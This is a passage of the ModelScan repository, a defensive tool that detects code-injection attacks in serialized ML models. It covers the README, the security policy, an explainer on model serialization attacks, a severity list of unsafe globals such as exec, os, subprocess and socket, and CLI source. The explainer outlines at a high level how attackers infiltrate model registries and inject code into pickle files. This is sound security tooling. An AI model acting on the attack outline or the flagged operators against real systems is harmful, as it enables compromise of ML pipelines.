Trail**: Gain full visibility into all scans and results, empowering you to identify and mitigate threats effectively. 69 | 70 | ## Getting Started 71 | 72 | ### How ModelScan Works 73 | 74 | If loading a model with your machine learning framework automatically executes the attack, 75 | how does ModelScan check the content without loading the malicious code? 76 | 77 | Simple, it reads the content of the file one byte at a time just like a string, looking for 78 | code signatures that are unsafe. This makes it incredibly fast, scanning models in the time it 79 | takes for your computer to process the total filesize from disk(seconds in most cases). It also secure. 80 | 81 | ModelScan ranks the unsafe code as: 82 | 83 | - CRITICAL 84 | - HIGH 85 | - MEDIUM 86 | - LOW 87 | 88 | ![ModelScan Flow Chart](/imgs/model_scan_flow_chart.png) 89 | 90 | If an issue is detected, reach out to the author's of the model immediately to determine the cause. 91 | 92 | In some cases, code may be embedded in the model to make things easier to reproduce as a data scientist, but 93 | it opens you up for attack. Use your discretion to determine if that is appropriate for your workloads. 94 | 95 | ### What Models and Frameworks Are Supported? 96 | 97 | This will be expanding continually, so look out for changes in our release notes. 98 | 99 | At present, ModelScan supports any Pickle derived format and many others: 100 | 101 | | ML Library | API | Serialization Format | modelscan support | 102 | |----------------------------------------------|------------------------------------------------------------------------------------------------------------|-------------------------------------|-------------------| 103 | | Pytorch | [torch.save() and torch.load()](https://pytorch.org/tutorials/beginner/saving_loading_models.html ) | Pickle | Yes | 104 | | Tensorflow | [tf.saved_model.save()](https://www.tensorflow.org/guide/saved_model) | Protocol Buffer | Yes | 105 | | Keras | [keras.models.save(save_format= 'h5')](https://www.tensorflow.org/guide/keras/serialization_and_saving) | HD5 (Hierarchical Data Format) | Yes | 106 | | | [keras.models.save(save_format= 'keras')](https://www.tensorflow.org/guide/keras/serialization_and_saving) | Keras V3 (Hierarchical Data Format) | Yes | 107 | | Classic ML Libraries (Sklearn, XGBoost etc.) | pickle.dump(), dill.dump(), joblib.dump(), cloudpickle.dump() | Pickle, Cloudpickle, Dill, Joblib | Yes | 108 | 109 | ### Installation 110 | 111 | ModelScan is installed on your systems as a Python package(Python 3.9 to 3.12 supported). As shown from above you can install 112 | it by running this in your terminal: 113 | 114 | ```bash 115 | pip install modelscan 116 | ``` 117 | 118 | To include it in your project's dependencies so it is available for everyone, add it to your `requirements.txt` 119 | or `pyproject.toml` like this: 120 | 121 | ```toml 122 | modelscan = ">=0.1.1" 123 | ``` 124 | 125 | Scanners for Tensorflow or HD5 formatted models require installation with extras: 126 | 127 | ```bash 128 | pip install 'modelscan[ tensorflow, h5py ]' 129 | ``` 130 | 131 | ### Using ModelScan via CLI 132 | 133 | ModelScan supports the following arguments via the CLI: 134 | 135 | | Usage | Argument | Explanation | 136 | |----------------------------------------------------------------------------------|------------------|---------------------------------------------------------| 137 | | ```modelscan -h``` | -h or --help | View usage help | 138 | | ```modelscan -v``` | -v or --version | View version information | 139 | | ```modelscan -p /path/to/model_file``` | -p or --path | Scan a locally stored model | 140 | | ```modelscan -p /path/to/model_file --settings-file ./modelscan-settings.toml``` | --settings-file | Scan a locally stored model using custom configurations | 141 | | ```modelscan create-settings-file``` | -l or --location | Create a configurable settings file | 142 | | ```modelscan -r``` | -r or --reporting-format | Format of the output. Options are console, json, or custom (to be defined in settings-file). Default is console | 143 | | ```modelscan -r reporting-format -o file-name``` | -o or --output-file | Optional file name for output report | 144 | | ```modelscan --show-skipped``` | --show-skipped | Print a list of files that were skipped during the scan | 145 | 146 | Remember models are just like any other form of digital media, you should scan content from any untrusted source before use. 147 | 148 | #### CLI Exit Codes 149 | 150 | The CLI exit status codes are: 151 | 152 | - `0`: Scan completed successfully, no vulnerabilities found 153 | - `1`: Scan completed successfully, vulnerabilities found 154 | - `2`: Scan failed, modelscan threw an error while scanning 155 | - `3`: No supported files were passed to the tool 156 | - `4`: Usage error, CLI was passed invalid or incomplete options 157 | 158 | ### Understanding The Results 159 | 160 | Once a scan has been completed you'll see output like this if an issue is found: 161 | 162 | ![ModelScan Scan Output](https://github.com/protectai/modelscan/raw/main/imgs/cli_output.png) 163 | 164 | Here we have a model that has an unsafe operator for both `ReadFile` and `WriteFile` in the model. 165 | Clearly we do not want our models reading and writing files arbitrarily. We would now reach out 166 | to the creator of this model to determine what they expected this to do. In this particular case 167 | it allows an attacker to read our AWS credentials and write them to another place. 168 | 169 | That is a firm NO for usage. 170 | 171 | ## Integrating ModelScan In Your ML Pipelines and CI/CD Pipelines 172 | 173 | Ad-hoc scanning is a great first step, please drill it into yourself, peers, and friends to do 174 | this whenever they pull down a new model to explore. It is not sufficient to improve security 175 | for production MLOps processes. 176 | 177 | Model scanning needs to be performed more than once to accomplish the following: 178 | 179 | 1. Scan all pre-trained models before loading it for further work to prevent a compromised 180 | model from impacting your model building or data science environments. 181 | 2. Scan all models after training to detect a supply chain attack that compromises new models. 182 | 3. Scan all models before deploying to an endpoint to ensure that the model has not been compromised after storage. 183 | 184 | The red blocks below highlight this in a traditional ML Pipeline. 185 | ![MLOps Pipeline with ModelScan](https://github.com/protectai/modelscan/raw/main/imgs/ml_ops_pipeline_model_scan.png) 186 | 187 | The processes would be the same for fine-tuning or any modifications of LLMs, foundational models, or external model. 188 | 189 | Embed scans into deployment processes in your CI/CD systems to secure usage 190 | as models are deployed as well if this is done outside your ML Pipelines. 191 | 192 | ## Diving Deeper 193 | 194 | Inside the 📓[**notebooks**](https://github.com/protectai/modelscan/tree/main/notebooks) folder you can explore a number of notebooks that showcase 195 | exactly how Model Serialization Attacks can be performed against various ML Frameworks like TensorFlow and PyTorch. 196 | 197 | To dig more into the meat of how exactly these attacks work check out 🖹 [**Model Serialization Attack Explainer**](https://github.com/protectai/modelscan/blob/main/docs/model_serialization_attacks.md). 198 | 199 | If you encounter any other approaches for evaluating models in a static context, please reach out, we'd love 200 | to learn more! 201 | 202 | ## Licensing 203 | 204 | Copyright 2024 Protect AI 205 | 206 | Licensed under the Apache License, Version 2.0 (the "License"); 207 | you may not use this file except in compliance with the License. 208 | You may obtain a copy of the License at 209 | 210 | 211 | 212 | Unless required by applicable law or agreed to in writing, software 213 | distributed under the License is distributed on an "AS IS" BASIS, 214 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 215 | See the License for the specific language governing permissions and 216 | limitations under the License. 217 | 218 | ## Acknowledgements 219 | 220 | We were heavily inspired by [Matthieu Maitre](http://mmaitre314.github.io) who built [PickleScan](https://github.com/mmaitre314/picklescan). 221 | We appreciate the work and have extended it significantly with ModelScan. ModelScan is OSS’ed in the similar spirit as PickleScan. 222 | 223 | ## Contributing 224 | 225 | We would love to have you contribute to our open source ModelScan project. 226 | If you would like to contribute, please follow the details on [Contribution page](https://github.com/protectai/modelscan/blob/main/CONTRIBUTING.md). 227 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Security Policy 2 | 3 | ## Supported Versions 4 | 5 | | Version | Supported | 6 | | ------- | ------------------ | 7 | | 0.x | :white_check_mark: | 8 | | 1.x | :white_check_mark: | 9 | 10 | ## Reporting a Vulnerability 11 | 12 | If you find a vulnerability in modelscan, perform the following steps: 13 | 14 | 1. [Open an issue](https://github.com/protectai/modelscan/issues/new?assignees=&labels=bug&template=bug_report.md&title=[BUG]%20Security%20Vulnerability) in the modelscan repo. Use `[BUG] Security Vulnerability` as the title and do not include any vulnerability details in the issue description. 15 | 2. Send us an email at `security@protectai.com` with the following: 16 | - The link to the issue you created above. 17 | - Your GitHub handle. 18 | - Details about the vulnerability including: 19 | - A description of what the vulnerability is. 20 | - Evidence of the issue happening or references to the relevant lines of code. 21 | - Instructions to reproduce the issue. 22 | 23 | After we have reproduced the issue we will reply to the issue and [open a draft security advisory](https://docs.github.com/en/code-security/security-advisories/creating-a-security-advisory) and will discuss the details there. 24 | 25 | Once we've released a fix we will use the Security Advisory to announce the findings. 26 | -------------------------------------------------------------------------------- /docs/attack-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/docs/attack-1.png -------------------------------------------------------------------------------- /docs/attack-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/docs/attack-2.png -------------------------------------------------------------------------------- /docs/attack-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/docs/attack-3.png -------------------------------------------------------------------------------- /docs/model_serialization_attacks.md: -------------------------------------------------------------------------------- 1 | # Model Serialization Attacks 2 | 3 | Machine Learning(ML) models are the foundational asset in ML powered applications. The ability to store and retrieve models securely is critical for success. Depending on the ML library in use there are a number of common formats in which a model can be saved. Popular choices are: Pickle, HDF5/H5 (Hierarchical Data Format), TensorFlow SavedModel, Model Checkpoints, and ONNX (Open Neural Network Exchange). Many of these formats allow for code to be stored alongside the model and create an often overlooked threat vector. 4 | 5 | Models can be compromised in various ways, some are new like adversarial machine learning methods, others are common with traditional applications like denial of service attacks. While these can be a threat to safely operating an ML powered application, this document focuses on exposing the risk of Model Serialization Attacks. 6 | In a Model Serialization Attack malicious code is added to a model when it is saved, this is also called a code injection attack as well. When any user or system then loads the model for further training or inference the attack code is executed immediately, often with no visible change in behavior to users. This makes the attack a powerful vector and an easy point of entry for attacking broader machine learning components. 7 | 8 | To secure ML models, you need to understand what’s inside them and how they are stored on disk in a process called serialization. 9 | 10 | ML models are composed of: 11 | 12 | 1. **Vectors** **— core data structure** 13 | 1. NumPy arrays — Primarily used with classic ML frameworks (Scikit-learn, XGBoost, ..) 14 | 2. Tensors (TensorFlow Tensor, PyTorch Tensor, ..)
15 | Popular DNN frameworks like TensorFlow and Pytorch have implemented their own Tensor libraries that enable performant operations during training and inference. Typically DNN model weights and biases can be stored separately from the DNN Model Architecture (Computation and Transformations). 16 | 2. **Computation and Transformations** 17 | 1. Classic ML algorithms 18 | 1. Regression 19 | 2. Classification 20 | 3. Clustering and more 21 | 2. Deep Neural Network(DNN) layers 22 | 1. CNN based 23 | 2. RNN based 24 | 3. Transformers based and more 25 | 3. Vector/Tensor transformations 26 | 27 | Before digging into how a Model Serialization Attack works and how to scan for them, first you should learn a few approaches to saving models, and the security implications of each option. 28 | 29 | # Approaches for Storing ML Models & Security Implications 30 | 31 | ## 1. Pickle Variants 32 | 33 | **Pickle** and its variants (cloudpickle, dill, joblib) all store objects to disk in a general purpose way. These frameworks are completely ML agnostic and store Python objects as-is. 34 | 35 | Pickle is the defacto library for serializing ML models for following ML frameworks: 36 | 37 | 1. Classic ML models (scikit-learn, XGBoost, ..) 38 | 2. PyTorch models (via built-in [torch.save](http://torch.save) API) 39 | 40 | Pickle is also used to store vectors/tensors only for following frameworks: 41 | 42 | 1. Numpy via `numpy.save(.., allow_pickle=True, )` 43 | 2. PyTorch via `torch.save(model.state_dict(), ..)` 44 | 45 | ### Security Implications 46 | 47 | Pickle allows for arbitrary code execution and is highly vulnerable to code injection attacks with very large attack surface. Pickle documentation makes it clear with the following warning: 48 | 49 | > **Warning:** The `pickle` module **is not secure**. Only unpickle data you trust. 50 | > 51 | > 52 | > It is possible to construct malicious pickle data which will **execute 53 | > arbitrary code during unpickling**. Never unpickle data that could have come 54 | > from an untrusted source, or that could have been tampered with. 55 | > 56 | > Consider signing data with [hmac](https://docs.python.org/3/library/hmac.html#module-hmac) if you need to ensure that it has not 57 | > been tampered with. 58 | > 59 | > Safer serialization formats such as [json](https://docs.python.org/3/library/json.html#module-json) may be more appropriate if 60 | > you are processing untrusted data. 61 | 62 | Source: [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html) 63 | 64 | ## 2. TensorFlow SavedModel 65 | 66 | TensorFlow is one of the few ML frameworks to implement its own storage format, SavedModel format, basing it on the Protocol Buffer format. 67 | 68 | ### Security Implications 69 | 70 | This is generally a secure approach as majority of TensorFlow operations are just ML computations and transformations. However, exceptions exist that can be exploited for model serialization attacks: 71 | 72 | - `io.write_file` 73 | - `io.read_file` 74 | - `io.MatchingFiles` 75 | - Custom Operators — allow arbitrary code to be executed but these operators need to be explicitly loaded during Inference as a library which makes it hard to carry out a model serialization attack however these can be potent in a supply chain attack. So it is still important to treat TensorFlow models with custom operators to high degree of scrutiny. 76 | 77 | ## 3. H5 (Keras) 78 | 79 | Keras is one of the few ML frameworks to natively offer model serialization to the HDF5 format. HDF5 is a general format for data serialization popular in academia and research. Keras offers two flavors of HDF5/H5py: 80 | 81 | 1. `tf.keras.Model.save` with `save_format='h5'` or passing a filename that ends in `.h5` 82 | 2. New Keras v3 format — recommended since TensorFlow version v2.13.0
83 | Passing `save_format='tf'` to `save()` or passing a filename without an extension 84 | 85 | ### Security Implications 86 | 87 | This is generally a secure format with the exception of Keras Lambda layer operation. Lambda Layer operation allows for arbitrary code execution (meant for data pre/post processing before it gets passed to ML model) and hence opens up large attack surface. 88 | 89 | ## 4. Inference Only 90 | 91 | The frameworks in this category all implement their own internal ML Computational Graph with built-in operators. These operators do not perform disk or network I/O and hence have very small attack vector (if any). They strictly focus on ML computation and transformation. 92 | 93 | ### Security Implications 94 | 95 | These operators are restricted to ML computations and transformations and hence have small attack surface. Similar to the above category though, supply chain attacks can be carried out with Custom Operators, so treat any usage of that feature with a high degree of scrutiny. 96 | 97 | 1. ONNX 98 | 2. TensorRT 99 | 3. Apache TVM 100 | 101 | ## 5. Vector/Tensor Only 102 | 103 | Typically used for sharing DNN model weights only, without DNN architecture (computations and transformations). Some of the general purpose serialization frameworks used are: 104 | 105 | 1. JSON 106 | 2. MsgPack 107 | 3. Apache Arrow 108 | 4. FlatBuffers 109 | 110 | Following are special purpose serialization formats for storing vector/tensor (including but not limited to model weights and biases): 111 | 112 | 1. Safetensors 113 | 2. NPY/NPZ (NumPy’s own binary file format) 114 | 115 | ### Security Implication 116 | 117 | With the exception of pickle, these formats cannot execute arbitrary code. However, an attacker can modify weights and biases to tweak or influence the ML model differently resulting in security risk. Meaningful manipulation of model weights and biases to perform a poisoning attack is non-trivial but possible. 118 | 119 | ## Summary 120 | 121 | | Approach | Popularity | Risk of Model Serialization Attack Exploitability | 122 | | --- | --- | --- | 123 | | Pickle Variants | Very high | Very high | 124 | | Tensorflow SavedModel | High | Medium | 125 | | H5 (Keras) | High | Low (except Keras Lambda layer) | 126 | | Inference Only | Medium | Low | 127 | | Vector/Tensor Only | Low | Very low | 128 | 129 | With an understanding of various approaches to model serialization, explore how many popular choices are vulnerable to this attack with an end to end explanation. 130 | 131 | # End to end Attack Scenario 132 | 133 | 1. Internal attacker: 134 | The attack complexity will vary depending on the access trusted to an internal actor. 135 | 2. External attacker: 136 | External attackers usually have to start from scratch unless they have infiltrated already and are trying to perform privilege escalation attacks. 137 | 138 | ### Step 1: Find where ML models are stored 139 | 140 | In either case, the attacker will typically start with the system that stores ML models at rest. This is typically a specialized Model Registry or a generic artifact storage system. 141 | 142 | OSS examples: 143 | 144 | - [MLflow](https://mlflow.org/) (check out Protect AI’s [blog post series](https://protectai.com/blog/tag/mlflow) uncovering critical vulnerabilities in MLflow model artifact storage system) 145 | - [Kubeflow](https://www.kubeflow.org/docs/external-add-ons/kserve/webapp/) 146 | - [Aim](https://github.com/aimhubio/aim) 147 | 148 | Commercial examples: 149 | 150 | - [Amazon Sagemaker](https://docs.aws.amazon.com/sagemaker/latest/dg/model-registry.html) 151 | - [Azure ML](https://learn.microsoft.com/en-us/azure/machine-learning/how-to-manage-models) 152 | - [Google Cloud Vertex AI](https://cloud.google.com/vertex-ai/docs/model-registry/introduction) 153 | - [Oracle Cloud Data Science](https://docs.oracle.com/en-us/iaas/data-science/using/models-about.htm) 154 | 155 | ![Find ML Models](attack-1.png) 156 | 157 | ### Step 2: Infiltrate Model Registry 158 | 159 | There are many ways to carry out infiltration. Phishing and social engineering are very widely employed techniques for gaining access. Another technique would be to look for unpatched instances of an OSS Model Registry like MLflow (see [Protect AI blog post series](https://protectai.com/blog/tag/mlflow) for more). 160 | 161 | ![Infiltrate](attack-2.png) 162 | 163 | ### Step 3: Inject Malicious Code into ML models 164 | 165 | This is the easiest step of all. See [ModelScan Notebook Examples](https://github.com/protectai/modelscan/tree/main/notebooks) for details (working Notebooks and code samples) on how this attack can be carried out. For certain serialized model formats like pickle, an attacker can inject abitrary code that executes. This pushes the attack surface wide open to all kinds of attacks including few included below. 166 | 167 | ![Attack](attack-3.png) 168 | 169 | With how easy it is to compromise a model, it is important to know how to securely serialize models to mitigate this threat as much as possible. 170 | 171 | # How to Securely Serialize Models 172 | 173 | Avoid use of pickle (and its variants). It is by far the most insecure format for serializing models. Below we have recommendations (more to come soon): 174 | 175 | | ML Framework | Secure Serialization | Details | Pros | Cons | 176 | | --- | --- | --- | --- | --- | 177 | | **PyTorch** | ONNX | Export model to ONNX [via torch.onnx.export method](https://pytorch.org/tutorials/advanced/super_resolution_with_onnxruntime.html).

Avoid PyTorch’s torch.save functionality as it is not secure. | ONNX is a secure format. It does not allow for arbitrary code execution.

ONNX is significantly faster than raw PyTorch for Inference. | ONNX is not just a serialization format. The model undergoes conversion from a PyTorch to an ONNX model. ONNX maps PyTorch tensors and ML graph (computation) into its own. | 178 | | **TensorFlow** | SavedModel | TensorFlow native serialization format based on Protocol Buffers. | Native format. Easy to use. Fairly secure. | Handful or TF operations allow disk I/O that can be exploited.

ModelScan will look for these and generate finding. | 179 | | **Keras** | HDF5 or Keras v3 | TensorFlow native serialization format based on HDF5/H5. | Native format. Easy to use. Fairly secure. | Avoid lambda layer. It is not secure. Instead share pre/processing code between training and inference code.

ModelScan will look for lambda layer and generate finding. | 180 | 181 | # How to Secure ML Models 182 | 183 | Defense in Depth and Zero Trust are critical strategies for modern software security. We recommend following measures: 184 | 185 | 1. Only store ML models in a system with **authenticated access**. 186 | For instance MLflow (a very popular model OSS model registry) does not offer any authenticaion out of the box. Unfortunately, there are many public instances of MLflow on the Internet that did not place an authentication gateway in front of ML flow. The proprietary models on these instances are publicly accessible! 187 | 2. Implement fine grained least privilege access via **Authorization** or **IAM** (identity and Access Management) systems. 188 | 3. Use a scanning tool like **ModelScan** — this will catch any code injection attempts. 189 | 1. Scan all models before they are used(retraining, fine tuning, evaluation, or inference) at any and all points in your ML ecosystem. 190 | 4. **Encrypt models at rest** (eg. S3 bucket encryption) — this will reduce chances of an adversary (external or even internal) reading and writing models after a successful infiltration attempt. 191 | 5. **Encrypt models at transit** — always use TLS or mTLS for all HTTP/TCP connections including when models are loaded over the network including internal networks. This protects against MITM (man in the middle) attacks. 192 | 6. For your own models, **store checksum** and always **verify checksum** when loading models. This ensures integrity of the model file(s). 193 | 7. **Cryptographic signature** — this ensures both integrity and authenticity of the model. 194 | -------------------------------------------------------------------------------- /docs/severity_levels.md: -------------------------------------------------------------------------------- 1 | # modelscan Severity Levels 2 | 3 | modelscan classifies potentially malicious code injection attacks in the following four severity levels. 4 |

5 | 6 | - **CRITICAL:** A model file that consists of unsafe operators/globals that can execute code is classified at critical severity. These operators are: 7 | - exec, eval, runpy, sys, open, breakpoint, os, subprocess, socket, nt, posix 8 |

9 | - **HIGH:** A model file that consists of unsafe operators/globals that can not execute code but can still be exploited is classified at high severity. These operators are: 10 | - webbrowser, httplib, request.api, Tensorflow ReadFile, Tensorflow WriteFile 11 |

12 | - **MEDIUM:** A model file that consists of operators/globals that are neither supported by the parent ML library nor are known to modelscan are classified at medium severity. 13 | - Keras Lambda layer can also be used for arbitrary code execution. In general, it is not a best practise to add a Lambda layer to a ML model that can get exploited for code injection attacks. 14 | - Work in Progress: Custom operators will be classified at medium severity. 15 |

16 | - **LOW:** At the moment no operators/globals are classified at low severity level. 17 | -------------------------------------------------------------------------------- /imgs/PAI-ModelScan-banner-080323-space.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/PAI-ModelScan-banner-080323-space.png -------------------------------------------------------------------------------- /imgs/PAI-ModelScan-banner-080323-white.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/PAI-ModelScan-banner-080323-white.png -------------------------------------------------------------------------------- /imgs/PAI-social-product-ModelScan-1200x675.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/PAI-social-product-ModelScan-1200x675.png -------------------------------------------------------------------------------- /imgs/attack_example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/attack_example.png -------------------------------------------------------------------------------- /imgs/cli_output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/cli_output.png -------------------------------------------------------------------------------- /imgs/flow_chart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/flow_chart.png -------------------------------------------------------------------------------- /imgs/guardian_overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/guardian_overview.png -------------------------------------------------------------------------------- /imgs/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/logo.png -------------------------------------------------------------------------------- /imgs/ml_ops_pipeline_model_scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/ml_ops_pipeline_model_scan.png -------------------------------------------------------------------------------- /imgs/model_scan_flow_chart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/model_scan_flow_chart.png -------------------------------------------------------------------------------- /imgs/model_scan_tutorial.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/model_scan_tutorial.gif -------------------------------------------------------------------------------- /imgs/modelscan-unsafe-model.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/modelscan-unsafe-model.gif -------------------------------------------------------------------------------- /modelscan/__init__.py: -------------------------------------------------------------------------------- 1 | """CLI for scanning models""" 2 | 3 | import logging 4 | 5 | from modelscan._version import __version__ 6 | 7 | logging.getLogger("modelscan").addHandler(logging.NullHandler()) 8 | -------------------------------------------------------------------------------- /modelscan/_version.py: -------------------------------------------------------------------------------- 1 | __version__ = "0.0.0" 2 | -------------------------------------------------------------------------------- /modelscan/cli.py: -------------------------------------------------------------------------------- 1 | import logging 2 | import sys 3 | import os 4 | from pathlib import Path 5 | from typing import Optional 6 | from tomlkit import parse 7 | 8 | import click 9 | 10 | from modelscan.modelscan import ModelScan 11 | from modelscan._version import __version__ 12 | from modelscan.settings import ( 13 | SettingsUtils, 14 | DEFAULT_SETTINGS, 15 | DEFAULT_REPORTING_MODULES, 16 | ) 17 | from modelscan.tools.cli_utils import DefaultGroup 18 | 19 | logger = logging.getLogger("modelscan") 20 | 21 | 22 | CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"]) 23 | 24 | 25 | @click.group( 26 | "cli", 27 | cls=DefaultGroup, 28 | default="scan", 29 | context_settings=CONTEXT_SETTINGS, 30 | help=""" 31 | Modelscan detects machine learning model files that perform suspicious actions. 32 | 33 | To scan a model file or directory, simply point toward your desired path: 34 | `modelscan -p /path/to/model_file.h5` 35 | 36 | Scanning is the default action. If you'd like more information on configurations run: 37 | `modelscan scan --help` 38 | 39 | You can also create a configurable settings file using: 40 | `modelscan create-settings-file` 41 | 42 | """, 43 | default_if_no_args=True, 44 | ) 45 | def cli() -> None: 46 | pass 47 | 48 | 49 | @click.version_option(__version__, "-v", "--version") 50 | @click.option( 51 | "-p", 52 | "--path", 53 | type=click.Path(exists=True), 54 | default=None, 55 | help="Path to the file or folder to scan", 56 | ) 57 | @click.option( 58 | "-l", 59 | "--log", 60 | type=click.Choice(["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG"]), 61 | default="INFO", 62 | help="level of log messages to display (default: INFO)", 63 | ) 64 | @click.option( 65 | "--show-skipped", 66 | is_flag=True, 67 | default=False, 68 | help="Print a list of files that were skipped during the scan", 69 | ) 70 | @click.option( 71 | "--settings-file", 72 | type=click.Path(exists=True, dir_okay=False), 73 | help="Specify a settings file to use for the scan. Defaults to ./modelscan-settings.toml.", 74 | ) 75 | @click.option( 76 | "-r", 77 | "--reporting-format", 78 | type=click.Choice(["console", "json", "custom"]), 79 | default="console", 80 | help="Format of the output. Options are console, json, or custom (to be defined in settings-file). Default is console.", 81 | ) 82 | @click.option( 83 | "-o", 84 | "--output-file", 85 | type=click.Path(), 86 | default=None, 87 | help="Optional file name for output report", 88 | ) 89 | @cli.command( 90 | help="[Default] Scan a model file or directory for ability to execute suspicious actions. " 91 | ) # type: ignore 92 | @click.pass_context 93 | def scan( 94 | ctx: click.Context, 95 | log: str, 96 | path: Optional[str], 97 | show_skipped: bool, 98 | settings_file: Optional[str], 99 | reporting_format: str, 100 | output_file: Path, 101 | ) -> int: 102 | logger.setLevel(logging.INFO) 103 | logger.addHandler(logging.StreamHandler(stream=sys.stdout)) 104 | 105 | if log is not None: 106 | logger.setLevel(getattr(logging, log)) 107 | 108 | settings_file_path = Path( 109 | settings_file if settings_file else f"{os.getcwd()}/modelscan-settings.toml" 110 | ) 111 | 112 | settings = DEFAULT_SETTINGS 113 | 114 | if settings_file_path and settings_file_path.is_file(): 115 | with open(settings_file_path, encoding="utf-8") as sf: 116 | settings = parse(sf.read()).unwrap() 117 | click.echo(f"Detected settings file. Using {settings_file_path}. \n") 118 | else: 119 | click.echo( 120 | f"No settings file detected at {settings_file_path}. Using defaults. \n" 121 | ) 122 | 123 | modelscan = ModelScan(settings=settings) 124 | 125 | if path is not None: 126 | pathlibPath = Path().cwd() if path == "." else Path(path).absolute() 127 | if not pathlibPath.exists(): 128 | raise FileNotFoundError(f"Path {path} does not exist") 129 | else: 130 | modelscan.scan(path) 131 | else: 132 | raise click.UsageError("Command line must include a path") 133 | 134 | # Report scan results 135 | if reporting_format != "custom": 136 | modelscan._settings["reporting"]["module"] = DEFAULT_REPORTING_MODULES[ 137 | reporting_format 138 | ] 139 | 140 | modelscan._settings["reporting"]["settings"]["show_skipped"] = show_skipped 141 | modelscan._settings["reporting"]["settings"]["output_file"] = output_file 142 | 143 | modelscan.generate_report() 144 | 145 | # exit code 3 if no supported files were passed 146 | if not modelscan.scanned: 147 | return 3 148 | # exit code 2 if scan encountered errors 149 | elif modelscan.errors: 150 | return 2 151 | # exit code 1 if scan completed successfully and vulnerabilities were found 152 | elif modelscan.issues.all_issues: 153 | return 1 154 | # exit code 0 if scan completed successfully and no vulnerabilities were found 155 | else: 156 | return 0 157 | 158 | 159 | @cli.command("create-settings-file", help="Create a modelscan settings file") # type: ignore 160 | @click.option( 161 | "-f", "--force", is_flag=True, help="Overwrite existing settings file if it exists." 162 | ) 163 | @click.option( 164 | "-l", 165 | "--location", 166 | type=click.Path(dir_okay=False, writable=True), 167 | help="The specific filepath to write the settings file.", 168 | ) 169 | def create_settings(force: bool, location: Optional[str]) -> None: 170 | working_dir = os.getcwd() 171 | settings_path = os.path.join(working_dir, "modelscan-settings.toml") 172 | 173 | if location: 174 | settings_path = location 175 | 176 | try: 177 | open(settings_path, encoding="utf-8") 178 | if force: 179 | with open(settings_path, mode="w", encoding="utf-8") as settings_file: 180 | settings_file.write(SettingsUtils.get_default_settings_as_toml()) 181 | settings_file.close() 182 | else: 183 | logger.warning( 184 | "%s file already exists. Please use `--force` flag if you intend to overwrite it.", 185 | settings_path, 186 | ) 187 | 188 | except FileNotFoundError: 189 | with open(settings_path, mode="w", encoding="utf-8") as settings_file: 190 | settings_file.write(SettingsUtils.get_default_settings_as_toml()) 191 | settings_file.close() 192 | 193 | 194 | def main() -> None: 195 | result = 0 196 | try: 197 | result = cli.main(standalone_mode=False) 198 | 199 | except click.ClickException as e: 200 | click.echo(f"Error: {e}") 201 | with click.Context(cli) as ctx: 202 | click.echo(cli.get_help(ctx)) 203 | # exit code 4 for CLI usage errors 204 | result = 4 205 | 206 | except Exception as e: 207 | click.echo(f"Exception: {e}") 208 | # exit code 2 if scan throws exceptions 209 | result = 2 210 | 211 | finally: 212 | sys.exit(result) 213 | 214 | 215 | if __name__ == "__main__": 216 | main() 217 | -------------------------------------------------------------------------------- /modelscan/error.py: -------------------------------------------------------------------------------- 1 | from modelscan.model import Model 2 | import abc 3 | from pathlib import Path 4 | from typing import Dict 5 | 6 | 7 | class ErrorBase(metaclass=abc.ABCMeta): 8 | message: str 9 | 10 | def __init__(self, message: str) -> None: 11 | self.message = message 12 | 13 | @abc.abstractmethod 14 | def __str__(self) -> str: 15 | raise NotImplementedError() 16 | 17 | @staticmethod 18 | @abc.abstractmethod 19 | def name() -> str: 20 | raise NotImplementedError 21 | 22 | def to_dict(self) -> Dict[str, str]: 23 | return { 24 | "category": self.name(), 25 | "description": self.message, 26 | } 27 | 28 | 29 | class ModelScanError(ErrorBase): 30 | def __str__(self) -> str: 31 | return f"The following error was raised: \n{self.message}" 32 | 33 | @staticmethod 34 | def name() -> str: 35 | return "MODEL_SCAN" 36 | 37 | 38 | class ModelScanScannerError(ModelScanError): 39 | scan_name: str 40 | model: Model 41 | 42 | def __init__( 43 | self, 44 | scan_name: str, 45 | message: str, 46 | model: Model, 47 | ) -> None: 48 | super().__init__(message) 49 | self.scan_name = scan_name 50 | self.model = model 51 | 52 | def __str__(self) -> 